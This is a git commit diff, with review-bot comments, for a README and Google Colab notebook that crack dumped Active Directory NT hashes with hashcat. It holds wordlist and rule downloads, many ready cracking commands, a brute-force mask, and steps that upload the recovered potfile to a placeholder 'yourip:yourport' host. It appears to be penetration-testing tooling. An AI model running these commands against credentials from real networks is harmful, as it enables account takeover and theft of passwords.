Example NTDS
parent
96088a98d8
commit
e011bf2098
38
README.md
38
README.md
|
@ -7,32 +7,46 @@ Néphélées (Νεφήλαι, Nephḗlai) : cloud nymphs greek - also ntds crack
|
||||||
|
|
||||||
## V1 - Google Colab
|
## V1 - Google Colab
|
||||||
|
|
||||||
Roll for Tesla P100
|
|
||||||
|
|
||||||
* https://github.com/ShutdownRepo/hashonymize
|
* https://github.com/ShutdownRepo/hashonymize
|
||||||
* https://github.com/ShutdownRepo/google-colab-hashcat
|
* https://github.com/ShutdownRepo/google-colab-hashcat
|
||||||
* https://github.com/mxrch/penglab
|
* https://github.com/mxrch/penglab
|
||||||
|
* https://colab.research.google.com/drive/1arm1_HEMb868mk18FlLkEcqvHPB_Ibgb#scrollTo=lWPQqb3oETLd
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
Go on : https://colab.research.google.com/github/mxrch/penglab/blob/master/penglab.ipynb
|
Go on : https://colab.research.google.com/github/mxrch/penglab/blob/master/penglab.ipynb
|
||||||
Select "Runtime", "Change runtime type", and set "Hardware accelerator" to GPU.
|
Select "Runtime", "Change runtime type", and set "Hardware accelerator" to GPU.
|
||||||
Change the config by setting "True" at tools you want to install.
|
Change the config by setting "True" at tools you want to install.
|
||||||
Select "Runtime" and "Run all" !
|
Select "Runtime" and "Run all" !
|
||||||
|
|
||||||
|
|
||||||
Workflow example 3 (OPSEC: crack anonymized hashes)
|
|
||||||
run the preparation script below
|
|
||||||
on your local machine, run hashonymize to anonymize your hash lists
|
|
||||||
upload your anon hashes list on the colab !wget http://yourip:yourport/yourfile
|
|
||||||
run a hashcat command like this to start cracking !hashcat --status --hash-type 1000 --attack-mode 0 --username DOMAIN.LOCAL.ntds wordlists/rockyou.txt
|
|
||||||
recover the .pot file from the Google Colab !curl --upload-file ~/.hashcat/hashcat.potfile http://yourip:yourport/
|
|
||||||
on your local machine, run the following hashcat command with the recovered potfile to match real usernames with cracked password hashcat --potfile-path hashcat.potfile --hash-type 1000 --username DOMAIN.LOCAL.ntds wordlists/rockyou.txt
|
|
||||||
hashcat -m 1000 --potfile-path ntds.cracked ntds.tocrack --show --username
|
|
||||||
```
|
```
|
||||||
|
|
||||||
* markov, keyboard walking, dico + rules , haveibeenpwn
|
* markov, keyboard walking, dico + rules , haveibeenpwn
|
||||||
* reuse old pot (extract passwd to new wordlist)
|
* reuse old pot (extract passwd to new wordlist)
|
||||||
|
|
||||||
|
Here are some of the most used attack modes for the `--attack-mode` option
|
||||||
|
```
|
||||||
|
0 Wordlist (with or without rules)
|
||||||
|
3 Pure bruteforce
|
||||||
|
```
|
||||||
|
|
||||||
|
Here are some of the most used hash types for the `--hash-type` option
|
||||||
|
```ps1
|
||||||
|
1000 NTLM (actually its for NT hashes)
|
||||||
|
3000 LM
|
||||||
|
5500 Net-NTLMv1 (actually, it should be called NTLMv1)
|
||||||
|
5600 Net-NTLMv2 (actually, it should be called NTLMv2)
|
||||||
|
13100 Kerberoast
|
||||||
|
18200 ASREProast
|
||||||
|
22000 WPA-PBKDF2-PMKID+EAPOL
|
||||||
|
16800 WPA-PMKID-PBKDF2
|
||||||
|
0 md5
|
||||||
|
100 sha1
|
||||||
|
1400 sha2-256
|
||||||
|
1700 sha2-512
|
||||||
|
|
||||||
|
# 2 hours
|
||||||
|
-a 3 -1 ?l?d?u ?1?1?1?1?1?1?1?1
|
||||||
|
```
|
||||||
|
|
||||||
## V2 - UI
|
## V2 - UI
|
||||||
|
|
||||||
* https://github.com/Coalfire-Research/npk
|
* https://github.com/Coalfire-Research/npk
|
||||||
|
|
|
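Review bot: The new `--hash-type` block in README.md ends with a stray mask fragment, `# 2 hours` followed by `-a 3 -1 ?l?d?u ?1?1?1?1?1?1?1?1`, which is not a hash type and has no `hashcat -m 1000 ...` prefix, so it reads as one more row of the table. Move it under its own heading as a complete command, and reconcile the estimate with the notebook, which gives "around 3 hours on a p100" for the same mask. The block is also fenced as `ps1` although it is a plain reference list. This version drops the "Workflow example 3 (OPSEC: crack anonymized hashes)" steps from the README while the notebook keeps them; a one-line pointer to the notebook would keep the anonymization step visible to README readers.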
@ -3,10 +3,9 @@
|
||||||
"nbformat_minor": 0,
|
"nbformat_minor": 0,
|
||||||
"metadata": {
|
"metadata": {
|
||||||
"colab": {
|
"colab": {
|
||||||
"name": "google-colab-hashcat.ipynb",
|
"name": "google_colab_hashcat.ipynb",
|
||||||
"provenance": [],
|
"provenance": [],
|
||||||
"collapsed_sections": [],
|
"collapsed_sections": []
|
||||||
"include_colab_link": true
|
|
||||||
},
|
},
|
||||||
"kernelspec": {
|
"kernelspec": {
|
||||||
"name": "python3",
|
"name": "python3",
|
||||||
|
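Review bot: The `colab.name` value in this metadata hunk is set to `google_colab_hashcat.ipynb`, the upstream notebook's name, while the first markdown cell is retitled "Nephelees - NTDS cracking on Google Colab" in the same commit. Use a name that matches this project so the notebook opened in Colab is not mistaken for the upstream one. The hunk also leaves `"collapsed_sections": []` as the last key after removing `"include_colab_link": true`; check that the removal is intended and not a side effect of re-saving from Colab.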
@ -18,169 +17,187 @@
|
||||||
{
|
{
|
||||||
"cell_type": "markdown",
|
"cell_type": "markdown",
|
||||||
"metadata": {
|
"metadata": {
|
||||||
"id": "view-in-github",
|
"id": "bcgg59uiIxrv"
|
||||||
"colab_type": "text"
|
|
||||||
},
|
},
|
||||||
"source": [
|
"source": [
|
||||||
"<a href=\"https://colab.research.google.com/github/ShutdownRepo/google-colab-hashcat/blob/main/google_colab_hashcat.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>"
|
"# Nephelees - NTDS cracking on Google Colab\r\n",
|
||||||
]
|
"1. Select \"Runtime\", \"Change runtime type\", and set \"Hardware accelerator\" to GPU. \r\n",
|
||||||
},
|
"2. Select \"Runtime\" and \"Run all\" !\r\n",
|
||||||
{
|
"1. on your local machine, run [hashonymize](https://github.com/ShutdownRepo/hashonymize) to anonymize your hash lists\r\n",
|
||||||
"cell_type": "markdown",
|
"2. upload your anon hashes list on the colab `!wget http://yourip:yourport/yourfile` or with the upload button\r\n",
|
||||||
"metadata": {
|
"3. install requirements\r\n",
|
||||||
"id": "2ommePNS-o92"
|
"4. run a hashcat command like this to start cracking `!hashcat --status --hash-type 1000 --attack-mode 0 --username DOMAIN.LOCAL.ntds wordlists/rockyou.txt`\r\n",
|
||||||
},
|
"5. recover the .pot file from the Google Colab `!curl --upload-file ~/.hashcat/hashcat.potfile http://yourip:yourport/`\r\n",
|
||||||
"source": [
|
"6. on your local machine, run the following hashcat command with the recovered potfile to match real usernames with cracked password `hashcat --potfile-path hashcat.potfile --hash-type 1000 --username DOMAIN.LOCAL.ntds wordlists/rockyou.txt`\r\n",
|
||||||
"# Google colab hash cracking\n",
|
"\r\n",
|
||||||
"\n",
|
"**/!\\** For every 12hrs or so Disk, RAM, VRAM, CPU cache etc data that is on our alloted virtual machine will get erased. "
|
||||||
"<p align=\"center\">\n",
|
|
||||||
" <a href=\"https://colab.research.google.com/github/ShutdownRepo/google-colab-hashcat/blob/main/google_colab_hashcat.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>\n",
|
|
||||||
" <a href=\"https://twitter.com/intent/follow?screen_name=_nwodtuhs\" title=\"Follow\"><img src=\"https://img.shields.io/twitter/follow/_nwodtuhs?label=Shutdown&style=social\"></a>\n",
|
|
||||||
"</p>\n",
|
|
||||||
"\n",
|
|
||||||
"## Workflow example 1 (simple wordlist)\n",
|
|
||||||
"\n",
|
|
||||||
"This Google colab can be used for hash cracking with wordlists and rules.\n",
|
|
||||||
"Here is an example of that can be followed to crack NT hashes.\n",
|
|
||||||
"\n",
|
|
||||||
"1. run the preparation script below\n",
|
|
||||||
"2. upload your hashes list on the colab `!wget http://yourip:yourport/yourfile`\n",
|
|
||||||
"3. run a hashcat command like this to start cracking `!hashcat --status --hash-type 1000 --attack-mode 0 --username DOMAIN.LOCAL.ntds wordlists/rockyou.txt`\n",
|
|
||||||
"\n",
|
|
||||||
"## Workflow example 2 (wordlist + rules)\n",
|
|
||||||
"\n",
|
|
||||||
"This is an example that is especially useful for internal engagements where users often use a transformation of the corp name as password (i.e. Corp2016!).\n",
|
|
||||||
"\n",
|
|
||||||
"1. create a wordlist based on some names that are currently used in the company\n",
|
|
||||||
"```\n",
|
|
||||||
"company\n",
|
|
||||||
"cpmny\n",
|
|
||||||
"corp\n",
|
|
||||||
"management\n",
|
|
||||||
"admin\n",
|
|
||||||
"```\n",
|
|
||||||
"2. upload your hashes list on the colab `!wget http://yourip:yourport/yourfile`\n",
|
|
||||||
"3. run the hashcat command `!hashcat --status --hash-type 1000 --attack-mode 0 --username --rules-file rules/d3adhob0.rule DOMAIN.LOCAL.ntds company.lst`\n",
|
|
||||||
"\n",
|
|
||||||
"## Workflow example 3 (OPSEC: crack anonymized hashes)\n",
|
|
||||||
"\n",
|
|
||||||
"1. run the preparation script below\n",
|
|
||||||
"2. on your local machine, run [hashonymize](https://github.com/ShutdownRepo/hashonymize) to anonymize your hash lists\n",
|
|
||||||
"3. upload your anon hashes list on the colab `!wget http://yourip:yourport/yourfile`\n",
|
|
||||||
"4. run a hashcat command like this to start cracking `!hashcat --status --hash-type 1000 --attack-mode 0 --username DOMAIN.LOCAL.ntds wordlists/rockyou.txt`\n",
|
|
||||||
"5. recover the .pot file from the Google Colab `!curl --upload-file ~/.hashcat/hashcat.potfile http://yourip:yourport/`\n",
|
|
||||||
"6. on your local machine, run the following hashcat command with the recovered potfile to match real usernames with cracked password `hashcat --potfile-path hashcat.potfile --hash-type 1000 --username DOMAIN.LOCAL.ntds wordlists/rockyou.txt`\n",
|
|
||||||
"\n",
|
|
||||||
"hashcat -m 1000 --potfile-path ntds.cracked ntds.tocrack --show --username\n",
|
|
||||||
"\n",
|
|
||||||
"## Short hashcat manual\n",
|
|
||||||
"\n",
|
|
||||||
"Here are some useful options\n",
|
|
||||||
"```\n",
|
|
||||||
"--status Enable automatic update of the status screen\n",
|
|
||||||
"--attack-mode Attack-mode, see references below\n",
|
|
||||||
"--hash-type Hash-type, see references below\n",
|
|
||||||
"--username Enable ignoring of usernames in hashfile \n",
|
|
||||||
"--rules-file Multiple rules applied to each word from wordlists\n",
|
|
||||||
"--potfile-path Specific path to potfile\n",
|
|
||||||
"```\n",
|
|
||||||
"\n",
|
|
||||||
"Here are some of the most used attack modes for the `--attack-mode` option\n",
|
|
||||||
"```\n",
|
|
||||||
"0 Wordlist (with or without rules)\n",
|
|
||||||
"3 Pure bruteforce\n",
|
|
||||||
"```\n",
|
|
||||||
"\n",
|
|
||||||
"Here are some of the most used hash types for the `--hash-type` option\n",
|
|
||||||
"```\n",
|
|
||||||
"1000 NTLM (actually it's for NT hashes)\n",
|
|
||||||
"3000 LM\n",
|
|
||||||
"5500 Net-NTLMv1 (actually, it should be called NTLMv1)\n",
|
|
||||||
"5600 Net-NTLMv2 (actually, it should be called NTLMv2)\n",
|
|
||||||
"13100 Kerberoast\n",
|
|
||||||
"18200 ASREProast\n",
|
|
||||||
"22000 WPA-PBKDF2-PMKID+EAPOL\n",
|
|
||||||
"16800 WPA-PMKID-PBKDF2\n",
|
|
||||||
"0 md5\n",
|
|
||||||
"100 sha1\n",
|
|
||||||
"1400 sha2-256\n",
|
|
||||||
"1700 sha2-512\n",
|
|
||||||
"```\n",
|
|
||||||
"\n",
|
|
||||||
"# Credits\n",
|
|
||||||
"Credits go to mxrch for his original project called [penglab](https://github.com/mxrch/penglab)"
|
|
||||||
]
|
|
||||||
},
|
|
||||||
{
|
|
||||||
"cell_type": "markdown",
|
|
||||||
"metadata": {
|
|
||||||
"id": "NMFCTYwaKtu7"
|
|
||||||
},
|
|
||||||
"source": [
|
|
||||||
"# Your hash cracking starts here"
|
|
||||||
]
|
]
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
"cell_type": "code",
|
"cell_type": "code",
|
||||||
"metadata": {
|
"metadata": {
|
||||||
"id": "7ucWO9luB4RG"
|
"colab": {
|
||||||
|
"base_uri": "https://localhost:8080/"
|
||||||
|
},
|
||||||
|
"id": "A86GVzaW6YpT",
|
||||||
|
"outputId": "fbeb72d7-0174-4812-91fe-6e74dba550ce"
|
||||||
},
|
},
|
||||||
"source": [
|
"source": [
|
||||||
"# 1. Run the preparation basis\n",
|
"# Check GPU (Tesla P100 is the best GPU on Colab)\r\n",
|
||||||
"# Edit the wordlists and rules you want\n",
|
"!nvidia-smi -L"
|
||||||
"\n",
|
],
|
||||||
"rockyou = True\n",
|
"execution_count": null,
|
||||||
"hashesorg2019 = False # huge wordlist (~12GB, ~6mins download)\n",
|
"outputs": [
|
||||||
"quickrules = True # hob064.rule\n",
|
{
|
||||||
"extensiverules = True # d3adhob0.rule\n",
|
"output_type": "stream",
|
||||||
"\n",
|
"text": [
|
||||||
"import os\n",
|
"GPU 0: Tesla P100-PCIE-16GB (UUID: GPU-711e1706-fccb-c944-73a8-796eb7a9d342)\n"
|
||||||
"\n",
|
],
|
||||||
"def install():\n",
|
"name": "stdout"
|
||||||
" rules_dir = \"rules\"\n",
|
}
|
||||||
" wordlists_dir = \"wordlists\"\n",
|
]
|
||||||
" # Removing the default sample data\n",
|
},
|
||||||
" !rm -r sample_data/\n",
|
{
|
||||||
" # Installing hashcat\n",
|
"cell_type": "code",
|
||||||
" print(\"[+] Installation of hashcat...\")\n",
|
"metadata": {
|
||||||
" !apt install cmake build-essential -y\n",
|
"id": "LWWa641VMu7Y"
|
||||||
" !apt install checkinstall git -y\n",
|
},
|
||||||
" !git clone https://github.com/hashcat/hashcat.git && cd hashcat && make -j 8 && make install\n",
|
"source": [
|
||||||
"\n",
|
"# Install Hashcat\r\n",
|
||||||
" # Installing wordlists\n",
|
"!apt install cmake build-essential -y\r\n",
|
||||||
" os.system(\"wordlists_dir={}\".format(wordlists_dir))\n",
|
"!apt install checkinstall git -y\r\n",
|
||||||
" !mkdir ./$wordlists_dir\n",
|
"!git clone https://github.com/hashcat/hashcat.git && cd hashcat && make -j 8 && make install"
|
||||||
" if rockyou:\n",
|
],
|
||||||
" !printf \"[+] Downloading the Rockyou wordlist...\\n\"\n",
|
"execution_count": null,
|
||||||
" !cd $wordlists_dir && wget https://download.weakpass.com/wordlists/90/rockyou.txt.gz\n",
|
"outputs": []
|
||||||
" !printf \"[+] Wordlist downloaded !\\n[+] Extraction...\\n\"\n",
|
},
|
||||||
" !cd $wordlists_dir && gunzip rockyou.txt.gz\n",
|
{
|
||||||
" !printf \"[+] Finished !\\n[+] Location : $(pwd)/$wordlists_dir/$(ls wordlists | grep rockyou)\"\n",
|
"cell_type": "code",
|
||||||
"\n",
|
"metadata": {
|
||||||
" if hashesorg2019:\n",
|
"id": "_M4BMeXCNCA8",
|
||||||
" !printf \"[+] Downloading the HashesOrg2019 wordlist...\\n\"\n",
|
"colab": {
|
||||||
" !cd $wordlists_dir && wget https://download.weakpass.com/wordlists/1851/hashesorg2019.gz\n",
|
"base_uri": "https://localhost:8080/"
|
||||||
" !printf \"[+] Wordlist downloaded !\\n[+] Extraction...\\n\"\n",
|
},
|
||||||
" !cd $wordlists_dir && gunzip hashesorg2019.gz\n",
|
"outputId": "f08a6696-17ca-4415-f572-402e96fb7717"
|
||||||
" !printf \"[+] Finished !\\n[+] Location : $(pwd)/$wordlists_dir/$(ls wordlists | grep hashesorg2019)\"\n",
|
},
|
||||||
"\n",
|
"source": [
|
||||||
" # Installing rules\n",
|
"# Download wordlists\r\n",
|
||||||
" os.system(\"rules_dir={}\".format(rules_dir))\n",
|
"import os\r\n",
|
||||||
" !mkdir ./$rules_dir\n",
|
"wordlists_dir = \"wordlists\"\r\n",
|
||||||
" if quickrules:\n",
|
"os.system(\"wordlists_dir={}\".format(wordlists_dir))\r\n",
|
||||||
" !printf \"[+] Downloading the hob064 ruleset...\\n\"\n",
|
"!mkdir ./$wordlists_dir\r\n",
|
||||||
" !cd $rules_dir && wget https://raw.githubusercontent.com/praetorian-inc/Hob0Rules/master/hob064.rule\n",
|
"\r\n",
|
||||||
" !printf \"[+] Rules downloaded !\\n\"\n",
|
"!printf \"[+] Downloading the Rockyou wordlist...\\n\"\r\n",
|
||||||
" !printf \"[+] Location : $(pwd)/$rules_dir/$(ls rules | grep hob064)\"\n",
|
"!cd $wordlists_dir && wget https://download.weakpass.com/wordlists/90/rockyou.txt.gz\r\n",
|
||||||
" if extensiverules:\n",
|
"!printf \"[+] Wordlist downloaded !\\n[+] Extraction...\\n\"\r\n",
|
||||||
" !printf \"[+] Downloading the d3adhob0 ruleset...\\n\"\n",
|
"!cd $wordlists_dir && gunzip rockyou.txt.gz\r\n",
|
||||||
" !cd $rules_dir && wget https://raw.githubusercontent.com/praetorian-inc/Hob0Rules/master/d3adhob0.rule\n",
|
"!printf \"[+] Finished !\\n[+] Location : $(pwd)/$wordlists_dir/$(ls wordlists | grep rockyou)\"\r\n",
|
||||||
" !printf \"[+] Rules downloaded !\\n\"\n",
|
"\r\n",
|
||||||
" !printf \"[+] Location : $(pwd)/$rules_dir/$(ls rules | grep d3adhob0)\"\n",
|
"!printf \"[+] Downloading the KerberoastPW wordlist...\\n\"\r\n",
|
||||||
"\n",
|
"!cd $wordlists_dir && wget https://gist.github.com/edermi/f8b143b11dc020b854178d3809cf91b5/raw/b7d83af6a8bbb43013e04f78328687d19d0cf9a7/kerberoast_pws.xz\r\n",
|
||||||
"install()\n",
|
"!printf \"[+] Wordlist downloaded !\\n[+] Extraction...\\n\"\r\n",
|
||||||
"!printf \"\\n[+] Install is over, listing rules and wordlists...\\n\"\n",
|
"!cd $wordlists_dir && unxz kerberoast_pws.xz\r\n",
|
||||||
"!ls rules wordlists"
|
"!printf \"[+] Finished !\\n[+] Location : $(pwd)/$wordlists_dir/$(ls wordlists | grep kerberoast_pws)\"\r\n",
|
||||||
|
"\r\n",
|
||||||
|
"!printf \"[+] Downloading the HashesOrg2019 wordlist...\\n\"\r\n",
|
||||||
|
"!cd $wordlists_dir && wget https://download.weakpass.com/wordlists/1851/hashesorg2019.gz\r\n",
|
||||||
|
"!printf \"[+] Wordlist downloaded !\\n[+] Extraction...\\n\"\r\n",
|
||||||
|
"!cd $wordlists_dir && gunzip hashesorg2019.gz\r\n",
|
||||||
|
"!printf \"[+] Finished !\\n[+] Location : $(pwd)/$wordlists_dir/$(ls wordlists | grep hashesorg2019)\"\r\n",
|
||||||
|
"\r\n",
|
||||||
|
"# !printf \"[+] Downloading the Have I been Pwned V7 wordlist...\\n\"\r\n",
|
||||||
|
"# !cd $wordlists_dir && wget https://hashes.org/download.php?type=found&hashlistId=8161 -O \tHaveIbeenPwnedV7.txt\r\n",
|
||||||
|
"# !printf \"[+] Wordlist downloaded !\\n[+]\\n\"\r\n",
|
||||||
|
"# !printf \"[+] Finished !\\n[+] Location : $(pwd)/$wordlists_dir/$(ls wordlists | grep HaveIbeenPwnedV7)\"\r\n"
|
||||||
|
],
|
||||||
|
"execution_count": 20,
|
||||||
|
"outputs": [
|
||||||
|
{
|
||||||
|
"output_type": "stream",
|
||||||
|
"text": [
|
||||||
|
"mkdir: cannot create directory ‘./wordlists’: File exists\n",
|
||||||
|
"[+] Downloading the Rockyou wordlist...\n",
|
||||||
|
"--2020-12-21 15:03:51-- https://download.weakpass.com/wordlists/90/rockyou.txt.gz\n",
|
||||||
|
"Resolving download.weakpass.com (download.weakpass.com)... 104.21.234.151, 104.21.234.150, 2606:4700:3038::6815:ea97, ...\n",
|
||||||
|
"Connecting to download.weakpass.com (download.weakpass.com)|104.21.234.151|:443... connected.\n",
|
||||||
|
"HTTP request sent, awaiting response... 200 OK\n",
|
||||||
|
"Length: 53357062 (51M) [application/octet-stream]\n",
|
||||||
|
"Saving to: ‘rockyou.txt.gz’\n",
|
||||||
|
"\n",
|
||||||
|
"rockyou.txt.gz 100%[===================>] 50.88M 11.8MB/s in 5.3s \n",
|
||||||
|
"\n",
|
||||||
|
"2020-12-21 15:03:56 (9.59 MB/s) - ‘rockyou.txt.gz’ saved [53357062/53357062]\n",
|
||||||
|
"\n",
|
||||||
|
"[+] Wordlist downloaded !\n",
|
||||||
|
"[+] Extraction...\n",
|
||||||
|
"gzip: rockyou.txt already exists; do you wish to overwrite (y or n)? ^C\n",
|
||||||
|
"[+] Finished !\n",
|
||||||
|
"[+] Location : /content/wordlists/rockyou.txt\n",
|
||||||
|
"rockyou.txt.gz[+] Downloading the KerberoastPW wordlist...\n",
|
||||||
|
"--2020-12-21 15:05:19-- https://gist.github.com/edermi/f8b143b11dc020b854178d3809cf91b5/raw/b7d83af6a8bbb43013e04f78328687d19d0cf9a7/kerberoast_pws.xz\n",
|
||||||
|
"Resolving gist.github.com (gist.github.com)... 192.30.255.113\n",
|
||||||
|
"Connecting to gist.github.com (gist.github.com)|192.30.255.113|:443... connected.\n",
|
||||||
|
"HTTP request sent, awaiting response... 301 Moved Permanently\n",
|
||||||
|
"Location: https://gist.githubusercontent.com/edermi/f8b143b11dc020b854178d3809cf91b5/raw/b7d83af6a8bbb43013e04f78328687d19d0cf9a7/kerberoast_pws.xz [following]\n",
|
||||||
|
"--2020-12-21 15:05:19-- https://gist.githubusercontent.com/edermi/f8b143b11dc020b854178d3809cf91b5/raw/b7d83af6a8bbb43013e04f78328687d19d0cf9a7/kerberoast_pws.xz\n",
|
||||||
|
"Resolving gist.githubusercontent.com (gist.githubusercontent.com)... 151.101.0.133, 151.101.64.133, 151.101.128.133, ...\n",
|
||||||
|
"Connecting to gist.githubusercontent.com (gist.githubusercontent.com)|151.101.0.133|:443... connected.\n",
|
||||||
|
"HTTP request sent, awaiting response... 200 OK\n",
|
||||||
|
"Length: 98784072 (94M) [application/octet-stream]\n",
|
||||||
|
"Saving to: ‘kerberoast_pws.xz.1’\n",
|
||||||
|
"\n",
|
||||||
|
"kerberoast_pws.xz.1 100%[===================>] 94.21M 185MB/s in 0.5s \n",
|
||||||
|
"\n",
|
||||||
|
"2020-12-21 15:05:21 (185 MB/s) - ‘kerberoast_pws.xz.1’ saved [98784072/98784072]\n",
|
||||||
|
"\n",
|
||||||
|
"[+] Wordlist downloaded !\n",
|
||||||
|
"[+] Extraction...\n",
|
||||||
|
"unxz: kerberoast_pws: File exists\n",
|
||||||
|
"[+] Finished !\n",
|
||||||
|
"[+] Location : /content/wordlists/kerberoast_pws\n",
|
||||||
|
"kerberoast_pws.xz\n",
|
||||||
|
"kerberoast_pws.xz.1[+] Downloading the HashesOrg2019 wordlist...\n",
|
||||||
|
"--2020-12-21 15:05:21-- https://download.weakpass.com/wordlists/1851/hashesorg2019.gz\n",
|
||||||
|
"Resolving download.weakpass.com (download.weakpass.com)... 104.21.234.150, 104.21.234.151, 2606:4700:3038::6815:ea97, ...\n",
|
||||||
|
"Connecting to download.weakpass.com (download.weakpass.com)|104.21.234.150|:443... connected.\n",
|
||||||
|
"HTTP request sent, awaiting response... 200 OK\n",
|
||||||
|
"Length: 4468104490 (4.2G) [application/octet-stream]\n",
|
||||||
|
"Saving to: ‘hashesorg2019.gz’\n",
|
||||||
|
"\n",
|
||||||
|
"hashesorg2019.gz 100%[===================>] 4.16G 11.7MB/s in 6m 0s \n",
|
||||||
|
"\n",
|
||||||
|
"2020-12-21 15:11:21 (11.9 MB/s) - ‘hashesorg2019.gz’ saved [4468104490/4468104490]\n",
|
||||||
|
"\n",
|
||||||
|
"[+] Wordlist downloaded !\n",
|
||||||
|
"[+] Extraction...\n",
|
||||||
|
"[+] Finished !\n",
|
||||||
|
"[+] Location : /content/wordlists/hashesorg2019"
|
||||||
|
],
|
||||||
|
"name": "stdout"
|
||||||
|
}
|
||||||
|
]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"cell_type": "code",
|
||||||
|
"metadata": {
|
||||||
|
"id": "d1cxo70DQDxs"
|
||||||
|
},
|
||||||
|
"source": [
|
||||||
|
"# Download rules\r\n",
|
||||||
|
"import os\r\n",
|
||||||
|
"rules_dir = \"/content/hashcat/rules\"\r\n",
|
||||||
|
"os.system(\"rules_dir={}\".format(rules_dir))\r\n",
|
||||||
|
"!mkdir ./$rules_dir\r\n",
|
||||||
|
"\r\n",
|
||||||
|
"!printf \"[+] Downloading the hob064 ruleset...\\n\"\r\n",
|
||||||
|
"!cd $rules_dir && wget https://raw.githubusercontent.com/praetorian-inc/Hob0Rules/master/hob064.rule\r\n",
|
||||||
|
"!printf \"[+] Rules downloaded !\\n\"\r\n",
|
||||||
|
"!printf \"[+] Location : $(ls $rules_dir | grep hob064)\"\r\n",
|
||||||
|
"\r\n",
|
||||||
|
"!printf \"[+] Downloading the d3adhob0 ruleset...\\n\"\r\n",
|
||||||
|
"!cd $rules_dir && wget https://raw.githubusercontent.com/praetorian-inc/Hob0Rules/master/d3adhob0.rule\r\n",
|
||||||
|
"!printf \"[+] Rules downloaded !\\n\"\r\n",
|
||||||
|
"!printf \"[+] Location : $(ls $rules_dir | grep d3adhob0)\""
|
||||||
],
|
],
|
||||||
"execution_count": null,
|
"execution_count": null,
|
||||||
"outputs": []
|
"outputs": []
|
||||||
|
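Review bot: In the new "Download rules" cell, `rules_dir` is the absolute path `/content/hashcat/rules` but the next command is `!mkdir ./$rules_dir`, which expands to `.//content/hashcat/rules` and is resolved relative to the working directory, not the directory the later `cd $rules_dir` enters. Drop the `./` and use `mkdir -p "$rules_dir"`. The `os.system("rules_dir={}".format(rules_dir))` line (and its `wordlists_dir` twin in the wordlist cell) only sets a variable in a shell that exits immediately, so it can be removed. The wordlist cell is committed with `"execution_count": 20` and stdout from a re-run that hit `mkdir: cannot create directory ‘./wordlists’: File exists`, an interactive `gzip: rockyou.txt already exists; do you wish to overwrite (y or n)? ^C` prompt, and a second copy saved as `kerberoast_pws.xz.1`. Clear outputs before committing and make the cell safe under "Run all", for example `mkdir -p`, `wget -nc` and `gunzip -f`. The rewritten markdown list also restarts at "1." after step 2, so the setup steps and the anonymized-hash workflow run together.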
@ -202,17 +219,99 @@
|
||||||
{
|
{
|
||||||
"cell_type": "code",
|
"cell_type": "code",
|
||||||
"metadata": {
|
"metadata": {
|
||||||
"id": "xYgvNWGbKXSp"
|
"id": "xYgvNWGbKXSp",
|
||||||
|
"colab": {
|
||||||
|
"base_uri": "https://localhost:8080/"
|
||||||
|
},
|
||||||
|
"outputId": "cfbf1c6b-7d90-4108-fefa-e7566ad718b1"
|
||||||
},
|
},
|
||||||
"source": [
|
"source": [
|
||||||
"# 3. Crack your hashes\n",
|
"# 3. Crack your hashes\n",
|
||||||
"# Examples\n",
|
"\n",
|
||||||
"# !hashcat --status --hash-type 1000 --attack-mode 0 --username DOMAIN.LOCAL.ntds wordlists/rockyou.txt\n",
|
"# Quick cracking - rockyou wordlist - around 10 minutes\n",
|
||||||
"# !hashcat --status --hash-type 1000 --attack-mode 0 --username --rules-file rules/hob064.rule DOMAIN.LOCAL.ntds company.lst\n",
|
"# !hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/rockyou.txt --username\n",
|
||||||
"!hashcat --benchmark"
|
"# !hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/rockyou.txt --rules-file /content/hashcat/rules/hob064.rule --username\n",
|
||||||
|
"# !hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/rockyou.txt --rules-file /content/hashcat/rules/d3adhob0.rule --username\n",
|
||||||
|
"# !hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/rockyou.txt --rules-file /content/hashcat/rules/dive.rule --username\n",
|
||||||
|
"\n",
|
||||||
|
"# Medium cracking - kerberoast wordlist - around 30 minutes\n",
|
||||||
|
"# !hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/kerberoast_pws --username\n",
|
||||||
|
"# !hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/kerberoast_pws --rules-file /content/hashcat/rules/hob064.rule --username\n",
|
||||||
|
"# !hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/kerberoast_pws --rules-file /content/hashcat/rules/d3adhob0.rule --username\n",
|
||||||
|
"# !hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/kerberoast_pws --rules-file /content/hashcat/rules/dive.rule --username\n",
|
||||||
|
"\n",
|
||||||
|
"# Insane cracking - hashesorg2019 wordlist - several days ?\n",
|
||||||
|
"# !hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/hashesorg2019 --username\n",
|
||||||
|
"!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/hashesorg2019 --rules-file /content/hashcat/rules/hob064.rule --username\n",
|
||||||
|
"# !hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/hashesorg2019 --rules-file /content/hashcat/rules/d3adhob0.rule --username\n",
|
||||||
|
"# !hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/hashesorg2019 --rules-file /content/hashcat/rules/dive.rule --username\n",
|
||||||
|
"\n",
|
||||||
|
"# ----- around 3 hours on a p100 ------\n",
|
||||||
|
